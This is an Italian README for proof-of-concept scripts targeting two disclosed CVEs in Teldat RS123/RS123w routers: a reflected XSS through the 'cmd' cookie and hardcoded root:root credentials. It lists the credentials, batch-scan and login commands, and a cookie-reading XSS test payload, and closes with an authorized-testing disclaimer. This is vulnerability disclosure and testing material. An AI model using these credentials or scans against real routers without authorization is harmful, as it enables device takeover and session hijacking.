
POC per CVE-2022-39996 (XSS Riflesso) e CVE-2022-39997 (Password Debole) nel router Teldat RS123/RS123w
Proof of Concept per due vulnerabilità scoperte nei router Teldat RS123 / RS123w.
| CVE ID | Tipo | CWE | CVSS | Gravità |
|---|---|---|---|---|
| CVE-2022-39996 | XSS Riflesso | CWE-79 | 6.1 | Media |
| CVE-2022-39997 | Password Debole | CWE-521 | 9.8 | Critica |
Prodotto interessato: Router Teldat RS123, RS123w
I router Teldat RS123/RS123w vengono forniti con credenziali predefinite hardcoded root:root. Gli amministratori spesso non le modificano, consentendo ad attaccanti non autenticati di ottenere accesso amministrativo completo tramite Telnet, SSH, HTTP o altri servizi.
Account: root
Password: root

pip install requests paramiko
# Controllo base (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Controllo completo (tutti i servizi inclusi HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Scansione batch
python CVE-2022-39997.py -f targets.txt
L'endpoint /upgrade/index.html riflette il valore del cookie HTTP cmd nella risposta senza sanificazione. Un attaccante può creare una richiesta malevola contenente JavaScript nel cookie cmd. Quando un amministratore autenticato visita la pagina, lo script viene eseguito nel contesto del browser dell'interfaccia web del router, consentendo il dirottamento della sessione o la manipolazione della configurazione.
cmd:

pip install requests
# Controllo XSS base
python CVE-2022-39996.py -t 192.168.1.1
# Con credenziali HTTP Basic Auth
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test con più payload XSS per conferma
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Genera pagina HTML POC standalone
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Payload XSS personalizzato
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| File | Descrizione |
|---|---|
CVE-2022-39997.py | Rilevamento password debole (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | Rilevamento XSS riflesso tramite cookie cmd |
Teldat's Router Vulnerability.md | Report completo di divulgazione della vulnerabilità |
Questi script POC sono destinati esclusivamente a test di sicurezza educativi e autorizzati. Non utilizzarli contro sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione al test. L'autore non è responsabile per qualsiasi uso improprio o danno.